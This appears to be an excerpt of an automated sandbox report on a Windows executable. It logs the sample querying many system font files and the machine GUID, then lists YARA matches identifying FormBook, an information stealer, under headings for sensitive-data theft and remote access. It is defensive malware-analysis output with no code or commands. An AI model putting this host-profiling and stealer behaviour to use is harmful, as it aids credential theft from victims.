          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\s6G3ZtvHZg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

          Remote Access Functionality:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000E.00000002.505721374.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.504313193.0000000000390000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.254514103.0000000003A7A000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.293813367.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000E.00000002.505963948.0000000000A30000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294200227.0000000001260000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.294175313.0000000001230000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.s6G3ZtvHZg.exe.400000.0.unpack, type: UNPACKEDPE

